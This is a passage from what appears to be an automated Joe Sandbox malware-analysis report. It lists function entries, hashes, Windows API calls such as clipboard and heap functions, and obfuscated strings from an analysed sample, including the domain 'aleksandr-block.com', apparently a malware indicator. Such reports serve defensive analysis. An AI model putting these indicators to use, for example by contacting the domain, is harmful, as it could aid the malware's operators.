                                                    • Opcode Fuzzy Hash: 6d4444b6b1bf2a15e57e1771f38e3a021ca3fddd5c8aadccf2c8c010083366ee
                                                    • Instruction Fuzzy Hash: 62F0ED752097028FE300CF24C59874BBBF2BB88304F25891CE4A44B394D7B9AA49CFC2
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: BlanketProxy
                                                    • String ID:
                                                    • API String ID: 3890896728-0
                                                    • Opcode ID: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                    • Instruction ID: 64921bb5e8d0d2665883c7be70a8893bafea9755363c5f099f224ef3642789f1
                                                    • Opcode Fuzzy Hash: 2e53f1206323ee2cade14c3224eb0fa84b417d36bb7d5e7098e7bca86b682ba1
                                                    • Instruction Fuzzy Hash: 29F07AB4109701CFE311DF64C5A4B5ABBF0FB85304F11985CE4958B3A1D7B59A49CF92
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                    • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                    • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                    • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                    • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                    • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                    • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $!$"$"$"$#$($,$0$1$3$3$3$6$6$8$8$9$:$;$;$<$=$>$>$@$A$A$A$B$C$D$D$E$G$J$K$L$S$U$V$W$W$X$Y$Z$Z$[$[$\$]$]$^$_$`$`$a$c$d$d$e$g$g$h$h$i$j$k$m$m$n$q$t$u$w$x$z$z$|$}$}
                                                    • API String ID: 0-4160516955
                                                    • Opcode ID: 19bd862a3cde9957cc5785825375ff06ae9118b167c36b91a2ce56913ab89352
                                                    • Instruction ID: 117aeaff4c6fbaf4157fdbc60f3db6fb52a806b9f41967a57c6fbeea88178428
                                                    • Opcode Fuzzy Hash: 19bd862a3cde9957cc5785825375ff06ae9118b167c36b91a2ce56913ab89352
                                                    • Instruction Fuzzy Hash: D503D07160C7C18AD3349B3885443DFBBD1AB96324F188A6EE4E9973D2D7B88981C747
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$$%$&$&$,$-$.$.$/$0$0$7$8$:$:$>$?$A$A$D$E$G$G$H$H$H$H$J$J$N$O$P$P$P$P$Q$R$R$R$S$T$V$X$Y$[$[$\$\$]$_$_$a$b$b$b$c$d$f$f$n$q$s$u$z$}
                                                    • API String ID: 0-3743354863
                                                    • Opcode ID: 5e1ca8346b529f0a9eae92fbb8e2aae2df75031782f2171215637c8570fb2fc6
                                                    • Instruction ID: 2205c5dd49912a15ade75e625562851e5fed45581a7bd861b37c18b6c067c818
                                                    • Opcode Fuzzy Hash: 5e1ca8346b529f0a9eae92fbb8e2aae2df75031782f2171215637c8570fb2fc6
                                                    • Instruction Fuzzy Hash: 4AB2BF7160C7C18BC3259A3C889439EBBD16BD6324F084B6EE4E98B3D2D7789845C797
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $!$"$"$#$#$#$($+$+$,$,$.$.$1$1$2$7$8$9179835195901B8DB960CC18D99B375A$:$;$;$<$?$H$I$I$I$M$N$O$O$P$Q$W$X$]$^$^$`$`$aleksandr-block.com$c$g$m$m$r$t$t$v$w$y${$~$~
                                                    • API String ID: 0-1440793964
                                                    • Opcode ID: d38c60a90824ad46133972e7c4cbed06e95cef7b7f0db34d98dc1f8cdee652d2
                                                    • Instruction ID: cb64673b7a5c261b5fced673e82aa1e2275cc430e4e3ca242fe1a1f134c2d7d8
                                                    • Opcode Fuzzy Hash: d38c60a90824ad46133972e7c4cbed06e95cef7b7f0db34d98dc1f8cdee652d2
                                                    • Instruction Fuzzy Hash: EB220E11D0C7EA89DB32C67C9C4878DBF611B23224F0847D9D4E86B2D3D7790A86DB66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                    • API String ID: 0-2870231824
                                                    • Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                    • Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
                                                    • Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                    • Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                    • API String ID: 0-2870231824
                                                    • Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                    • Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
                                                    • Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                    • Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !$*$6$6cxU$6cxU$6cxU$6cxU$8$J$X$X$Y$Y$[$[$_$c$kyeE
                                                    • API String ID: 0-79597815
                                                    • Opcode ID: fbbbd6998d66d1ff913caef885f0d1f43bf92717102f9addf7045befe193c24d
                                                    • Instruction ID: 42706493f26dcfc1d10290e159ccbf824b4cb947979334a7fe4c2d294b2d1955
                                                    • Opcode Fuzzy Hash: fbbbd6998d66d1ff913caef885f0d1f43bf92717102f9addf7045befe193c24d
                                                    • Instruction Fuzzy Hash: B0C1482361CB914BD31888BD8C9425BEEC24BEA234F1D877DD9F5873C2D5AD89068396
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AtP$GpFv$LH$LH$[T
                                                    • API String ID: 0-1191849916
                                                    • Opcode ID: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                    • Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
                                                    • Opcode Fuzzy Hash: 9f8a8d8b39a13838edde9a1b50270b6620bdc73dc6028a05be0a7079155c4cee
                                                    • Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: AtP$GpFv$LH$LH$[T
                                                    • API String ID: 237503144-1191849916
                                                    • Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                    • Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
                                                    • Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                    • Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
                                                    • API String ID: 0-709081256
                                                    • Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                    • Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
                                                    • Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                    • Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: =jh$D6v4$}z
                                                    • API String ID: 237503144-2424248051
                                                    • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                    • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                    • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                    • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                    • String ID:
                                                    • API String ID: 1006321803-0
                                                    • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                    • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                    • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                    • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AtP$GpFv$LH
                                                    • API String ID: 0-40351562
                                                    • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                    • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                    • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                    • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: 6G01$6G01$S"(w$S"(w$[XX^$f
                                                    • API String ID: 2994545307-3115683409
                                                    • Opcode ID: 61883efe96ca33c79856f788789606f753579e691f04b227c951374ef0c4db1f
                                                    • Instruction ID: ebcf572aee061de9b4dc2af0cc781152135a947e19cbb5be78f8ae6f4a52bc66
                                                    • Opcode Fuzzy Hash: 61883efe96ca33c79856f788789606f753579e691f04b227c951374ef0c4db1f
                                                    • Instruction Fuzzy Hash: B5220571A083419FC714CF19C880A6BBBE2EBC9314F14863EE4A5573A2D375DD4A8B96
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,0041755F), ref: 00418AD7
                                                    • FreeLibrary.KERNEL32(?), ref: 00418B19
                                                      • Part of subcall function 004402D0: LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary$InitializeThunk
                                                    • String ID: ^_$fg$
                                                    • API String ID: 764372645-722828377
                                                    • Opcode ID: 525dacdd8ed04eb7e87f2a7af5946cb79993a09b420d20e0efd7fc82858eb55f
                                                    • Instruction ID: 32a26824a101f77e2cdc0b8292c828813d5ce8b95ab05ea660f3df7b5e92ca69
                                                    • Opcode Fuzzy Hash: 525dacdd8ed04eb7e87f2a7af5946cb79993a09b420d20e0efd7fc82858eb55f
                                                    • Instruction Fuzzy Hash: A36223706083419BE724CB25CC947ABBBA2FFD5314F188A2DF195572E1D774DC828B8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: KWYb$R^lf$V]E^$[NC~$puGG
                                                    • API String ID: 0-3448173581
                                                    • Opcode ID: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                    • Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
                                                    • Opcode Fuzzy Hash: 68f8decb0507b526bb0b8b235139426a9b71c66a9f93ba188218d6a7d3b065e7
                                                    • Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <$C|$WR$~Bzx$~|
                                                    • API String ID: 0-1711356705
                                                    • Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                    • Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
                                                    • Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                    • Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C]E[$IIMC$R$uP$}UW^
                                                    • API String ID: 0-892063760
                                                    • Opcode ID: 205ed248482d7a065e056c637e6f518a5e6eb8ae255233571312f867963e7cbf
                                                    • Instruction ID: 6cbd51c0248f91b97843e71913ba0166c23e35ea759608a7bc928dd55ed2a06e
                                                    • Opcode Fuzzy Hash: 205ed248482d7a065e056c637e6f518a5e6eb8ae255233571312f867963e7cbf
                                                    • Instruction Fuzzy Hash: 7EB1D57164C3919AC3268F29849075BFFE09FD3754F0849ADE4D51B3C2D339894ACB9A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2$76$745:2$76$_\]$p@
                                                    • API String ID: 0-2055486527
                                                    • Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                    • Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
                                                    • Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                    • Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: ~
                                                    • API String ID: 237503144-2894255414
                                                    • Opcode ID: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                    • Instruction ID: 0060a675a86d7ee076ee5ed7f34d7278311ae35c8cfae6d949a6dc28de4d3802
                                                    • Opcode Fuzzy Hash: 7afbc3bd430aafb6d99ace3ea95c2faa1dcfd28ffa5abcf8623c816d7c1fadb5
                                                    • Instruction Fuzzy Hash: A351FEB56483459FE350DF61AC81A2FBBB9EB86704F00583CF6809B291DBB0D40ACB47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $&?3$0-/?$99C?$;(?>
                                                    • API String ID: 0-2409071036
                                                    • Opcode ID: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                    • Instruction ID: f66a5fe417f6b708e5f26068a280dd0292c096a76de8314330cd7006a92fc357
                                                    • Opcode Fuzzy Hash: e133a7b7fa4b30eba9d8dd8762af5ae8fa74075651ce804875519ff4ab040977
                                                    • Instruction Fuzzy Hash: 2AD15EB49007419FD720EF39D586752BFF0EB12300F544AAED8EA4B786D334A45ACB96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$MP$`]0o$mooj
                                                    • API String ID: 0-750224902
                                                    • Opcode ID: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                    • Instruction ID: b19b03646b16de912904001b94da70090da2d56033d31c768745f7e78282d27d
                                                    • Opcode Fuzzy Hash: b1852bd034d5f07e6c7418944058fbcc2db243f872094cebdf7b16bddf70df29
                                                    • Instruction Fuzzy Hash: EC71183150D3929AD711CF29849077BFFE1AF96344F1889BED4C4AB387C639890AC766
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: >j%h$YF$]Z
                                                    • API String ID: 0-4187760579
                                                    • Opcode ID: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                    • Instruction ID: 9eece3b8ce7a95ea6ecb53f0b37b23c6ac9ce84f3b4a74f9026e79692fb54b94
                                                    • Opcode Fuzzy Hash: 315e0b80a172105bdb6125941b7bc3327eb2f506a6e5818f00821b26c43edc6d
                                                    • Instruction Fuzzy Hash: CD02037160C3009BD7189F25C8916AFBBF2EFD5314F08892DE4D58B382E7399946C78A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /4*$XdVX$YvIp
                                                    • API String ID: 0-3691241376
                                                    • Opcode ID: fb236006c250ffc211ebc7f89fcda9cf565e59ebe00033e2a4db332be92296be
                                                    • Instruction ID: 349303a26e76b7dc74c53abfd61c9fa2d29ce462f76cb6652ed4d54e95d8ee3a
                                                    • Opcode Fuzzy Hash: fb236006c250ffc211ebc7f89fcda9cf565e59ebe00033e2a4db332be92296be
                                                    • Instruction Fuzzy Hash: CEE115B46083918FD7148F25D89126FBBE1EF96304F08886DF5C59B382DA39D846CB5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 9179835195901B8DB960CC18D99B375A$JO}$no
                                                    • API String ID: 0-2982269243
                                                    • Opcode ID: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                    • Instruction ID: a84f769f8163236c19afa71ab8ebfca9a7e40634951dcb5e8a3fb7dd6940477d
                                                    • Opcode Fuzzy Hash: 39d72df67d6d4dec9bb311bdf5152167ba102bc258e75940eeb29ed02a9edc23
                                                    • Instruction Fuzzy Hash: 5AC1F3B160C3408BD718DF35D8916AFBBE2EBD2304F144A2DE5D29B392DA38C509CB56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4$Nw$qp
                                                    • API String ID: 0-4265586298
                                                    • Opcode ID: a72a26d99092f791726df5a061ecc25ab9ce959f6045ffa4a19f4c9f5ef736d8
                                                    • Instruction ID: 1c14353b01c87222b99498af661210a9029df4456b24b55d3972913cfd48c548
                                                    • Opcode Fuzzy Hash: a72a26d99092f791726df5a061ecc25ab9ce959f6045ffa4a19f4c9f5ef736d8
                                                    • Instruction Fuzzy Hash: 0A61E5719183518BC728DF29C8612BBB7E1EFC6314F094A6EE9D69B391D7388C05C786
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0$}$~
                                                    • API String ID: 0-1378824556
                                                    • Opcode ID: 884f6f9cf58a5a59d449aea1ec521a8ac50cc9cc68e7f295d775d02287a41394
                                                    • Instruction ID: cc2bc466ecf6dadc7518a70f2b95efd366e8ae182a12733c5a40e6e465e138fe
                                                    • Opcode Fuzzy Hash: 884f6f9cf58a5a59d449aea1ec521a8ac50cc9cc68e7f295d775d02287a41394
                                                    • Instruction Fuzzy Hash: A7711832F0DA944BCB19897C4C212EA7A934BD3230F2DC3BED9B5973E5D4684D468399
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )2^$khvr$|lx1
                                                    • API String ID: 0-2191243274
                                                    • Opcode ID: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                    • Instruction ID: 4de4a3a3beb6c19d42a4d3ade4e4e91008c027f5d3f459ded0861b50ff37b2bd
                                                    • Opcode Fuzzy Hash: 4ccf6364555e8cdb5bfd8096454ae9d86d60a5367683d88ebbcbe3196d12286d
                                                    • Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18
                                                    APIs
                                                    • FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2242902876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: 3Z{
                                                    • API String ID: 3664257935-2331068373
                                                    • Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                    • Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
